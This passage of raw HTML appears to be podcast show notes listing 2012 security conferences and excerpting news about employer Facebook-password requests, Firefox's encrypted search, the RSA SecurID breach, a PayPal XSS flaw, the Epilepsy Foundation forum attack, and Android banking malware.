	</span><a href="http://www.outerz0ne.org/"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.outerz0ne.org</span></a><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28-29, 2012<br class="kix-line-break" /><br />
	Where: Bellingham Technical College &#8211; Bellingham, WA<br class="kix-line-break" /><br />
	</span><a href="http://www.linuxfestnorthwest.org/"><span style="font-size:13px;font-family:Verdana;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012<br class="kix-line-break" /><br />
	Where: MU Forensic Science Center &nbsp;- Huntington, West Virginia<br class="kix-line-break" /><br />
	</span><a href="http://www.appyide.org/"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.appyide.org/</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">LayerOne 2012<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 26-27, 2012<br class="kix-line-break" /><br />
	Where: Clarion Hotel &#8211; Anaheim, CA<br class="kix-line-break" /><br />
	</span><a href="http://www.layerone.org/"><span style="font-size:13px;font-family:Verdana;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.layerone.org</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Security 504: Hacker Techniques, Exploits &amp; Incident Handling &#8211; Matt Romanek</span></p>
<p><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: June 20 &#8211; 27, 2012<br class="kix-line-break" /><br />
	Where: Courtyard Seattle Federal Way, WA</span><a href="http://www.sans.org/mentor/details.php?nid=28014"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> <br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=28014</span></a><br />
	&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Social Engineering Training</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21-24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: August 20-24, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Bristol, UK</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;November 12-16, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Columbia, MD</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><a href="http://www.social-engineer.com/social-engineer-training"><span style="font-size:13px;font-family:Verdana;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.com/social-engineer-training</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Inside and Out of the Social-Engineer Toolkit (SET)<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21 &#8211; 22, 2012<br class="kix-line-break" /><br />
	When: July 23 &#8211; 24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas<br class="kix-line-break" /><br />
	</span><a href="http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; The &ldquo;Deuce&rdquo; Reunion<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012<br class="kix-line-break" /><br />
	Where: Louisville, KY<br class="kix-line-break" /><br />
	</span><a href="http://www.derbycon.com/"><span style="font-size:13px;font-family:Verdana;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Skydogcon</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><br class="kix-line-break" /><br />
	When: October 26-28<br class="kix-line-break" /><br />
	Where: Hotel Preston in Nashville, TN <br class="kix-line-break" /><br />
	</span><a href="http://www.skydogcon.com/"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.skydogcon.com</span></a><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:13px;font-family:Verdana;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;">&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://www.forbes.com/sites/kashmirhill/2012/03/22/senator-wants-to-make-it-illegal-for-employers-to-ask-for-your-facebook-password/"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.forbes.com/sites/kashmirhill/2012/03/22/senator-wants-to-make-it-illegal-for-employers-to-ask-for-your-facebook-password/</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://mashable.com/2012/03/23/facebook-responds-employers-passwords/"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://mashable.com/2012/03/23/facebook-responds-employers-passwords/</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">This week, a big AP story captured the nation&rsquo;s attention by pointing out that some employers are asking job seekers for their Facebook passwords:</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;In their efforts to vet applicants, some companies and government agencies are going beyond merely glancing at a person&rsquo;s social networking profiles and instead asking to log in as the user to have a look around.&rdquo;</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">After reading the story, many an American was aghast. But privacy attorney Behnam Dayanim told me earlier this month that, while it may be improper in terms of social conventions, it&rsquo;s actually legal for employers to do this (unless you want to split hairs about it violating Facebook&rsquo;s TOS).</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://searchengineland.com/firefox-to-use-google-secure-search-by-default-116231"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://searchengineland.com/firefox-to-use-google-secure-search-by-default-116231</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">An inconspicuous &quot;s&quot; added to various</span><a href="https://hg.mozilla.org/mozilla-central/rev/36fd3090b006"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> ​lines</span></a><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> of code in its latest nightly builds means that future versions of Firefox will send all search queries to Google in encrypted form. This means that instead of HTTP, the open source browser will use the HTTPS protocol, which encrypts traffic between the web site and browser using SSL. The nightly builds will feed through, over the next few months, until the feature is, most probably, in Firefox 14.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The change has been prompted by a discussion between Firefox developers which</span><a href="https://bugzilla.mozilla.org/show_bug.cgi?id=633773"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> started</span></a><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> about a year ago. Then, Google opposed making SSL the default, with Adam Langley, a member of Google&#39;s security team, explaining that the encrypted search was slower than the standard unencrypted search.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Google has since made encryption the global default for its own search site, though only for signed-in users. In early February, the Firefox development team gave the green light for the change to go ahead in the browser as well.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The switch to SSL means that only Google will be able to read search queries. According to Danny Sullivan, ​writing on his Search Engine Land blog, they will, however, continue to be contained in the referrer header which the browser sends to the relevant web site when a user clicks on an advert. He has asked both the Firefox and Internet Explorer development teams whether they would stop sending this critical referrer data, but has not received a response from either browser maker.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;</span><a href="http://www.cso.com.au/article/417761/zero_damage_from_last_year_rsa_breach"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.cso.com.au/article/417761/zero_damage_from_last_year_rsa_breach</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Even though the security breach of RSA last year resulted in the potential compromise of the company&#39;s SecurID login tokens &#8212; 50 million of which are currently in use &#8212; no real harm was done, says the company.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;There hasn&#39;t been a single breach that resulted in a loss, not a single one,&quot; RSA executive chairman Art Covellio told journalists in Sydney this week.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;There was only one publicly-disclosed breach [where] it was even suggested that information stolen from us was used, and that attack was defeated,&quot; he said, referring to the attack on US defence contractor Lockheed Martin.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">There were no breaches that weren&#39;t publicly disclosed either, said Coviello, because RSA stays very close to law enforcement and &quot;other agencies&quot; who, he said, would tell them about any breaches and work with them to ensure the replacement of tokens &quot;if necessary&quot;.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When the Lockheed story broke, RSA told customers that if they thought they were at risk then their SecurID tokens would be replaced. In the case of banks, RSA would provide transaction monitoring.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;Over and above that, there were belts and suspenders in a lot of the Australian banks because they had our transaction monitoring capability which gave them, believe it or not, four factors &#8212; the password, the PIN, the passcode, and transaction monitoring &#8212; and that story, try as we might, never really got out in the Australian press,&quot; Coviello said.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;So there was very, very, very, very, very little risk in those particular instances,&quot; he said. &quot;I don&#39;t think we ever hyped the threat.&quot;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.h-online.com/security/news/item/Embarrassing-security-failure-at-PayPal-1477905.html"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.h-online.com/security/news/item/Embarrassing-security-failure-at-PayPal-1477905.html</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Until just a few days ago, web sites belonging to the world&#39;s largest online payment service contained a security vulnerability in a key component that could have been exploited by fraudsters to steal information from customers. PayPal fixed the vulnerability shortly after being notified of its presence by The H&#39;s associates at heise Security. The eBay subsidiary was, however, unable to give any information on how such a serious security problem could have remained undetected.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A heise Security reader noticed that the search function on PayPal web pages was not filtering user input correctly, making it a simple matter to inject code into PayPal pages via a crafted URL. The problem affected pages at https://www.paypal.com which use SSL security. Customers log in to the site from these pages and also use them to make payments. For more information on why cross-site scripting vulnerabilities are a very real security problem, see the article Password stealing for dummies on The H.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">PayPal emphasises its security credentials in its advertising and presents itself as a certified payment system, in part based on a</span><a href="https://www.paypal-deutschland.de/external/Tuev-Zertifikat-2011.pdf"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> certificate issued by T&Uuml;V Saarland</span></a><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> in Europe. Reinhold Scheffel, managing director of tekit Consult, which certified PayPal, could only offer the following explanation for the problem, &quot;When the inspection was carried out, the flaw described by &#8230; was not necessarily present&quot;. PayPal did not consider itself able to answer specific questions on the incident. </span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;</span><a href="http://www.mister-info.com/?cmd=displaystory&amp;story_id=10401"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.mister-info.com/?cmd=displaystory&amp;story_id=10401</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">An internet forum, run by the non-profit Epilepsy Foundation, was attacked last week by a group of hackers. The attack, first reported by Wired News, exploited a function of the forums to post JavaScript code. The code injected by the hackers flashed two images repeatedly and tried to lead users off to external websites showing flashing lights and shapes intended to trigger off epileptic fits. The Epilepsy Foundation had to shut down the forum, and took some measures to prevent future attacks.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In a press release, the Foundation stated that several users of the forum, sufferers of epilepsy, experienced harsh migraines and seizures as a result of the attack. One lady, RyAnne Fultz, was paralyzed by the flashing images in what she calls her worst attack in over a year, until her 11-year old son managed to get her to stop looking at the screen and close the flashing images.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">They also posted a message regarding new measures saying &quot;In our upping of security on the forums, we have established the following new rules: No animated images are allowed to be used anywhere from now on. No GIFs are allowed at all anymore as well. No rich text is allowed in the body of messages at all, either.&quot;</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Wired News additionally reports that there is &quot;circumstantial evidence&quot; linking the perpetrators of the attack to the internet group &quot;Anonymous&quot;, who are most well known for their recent protests and attacks against the Church of Scientology, and their members created a reputation as &quot;griefers&quot; in the virtual worlds Second Life, and Habbo Hotel. The Austrian paper Krone reports that the &quot;usual goal of their attacks is to raise a fuss or disturb others&quot;. Following critical reports about the attack, members of the group blamed the attack on the Church of Scientology.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.eweek.com/c/a/Security/New-Android-Malware-Threatens-Users-Personal-Data-237273/"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.eweek.com/c/a/Security/New-Android-Malware-Threatens-Users-Personal-Data-237273/</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Google&#39;s Android mobile operating system continues to attract a growing number of malware threats as creators discover the ease of working with an open software environment. The result, as eWEEK noted, is a huge jump in malware over the last year. Some of these threats can be innovative in their efforts to extract financial data from unsuspecting users.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">One such threat, discovered by malware researchers at McAfee, found a new remotely controlled man-in-the-middle attack that can steal the initial password from a mobile device without actually infecting the user&#39;s device.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The malware uses its man-in-the-middle activity to pose as a token generator for a bank, using the bank&#39;s logo, according to McAfee researcher Carlos Castillo. The fake token-generator is really intended to look like the user&#39;s bank log-in screen, and it asks for the initial password. When it receives this, it runs XML code that captures additional access information, as well as the user&#39;s contact list. The initial contact that leads to a man-in-the-middle attack is usually a Short Messaging Service (SMS) text sent to the user&#39;s phone that appears to be from the bank.</span></p>
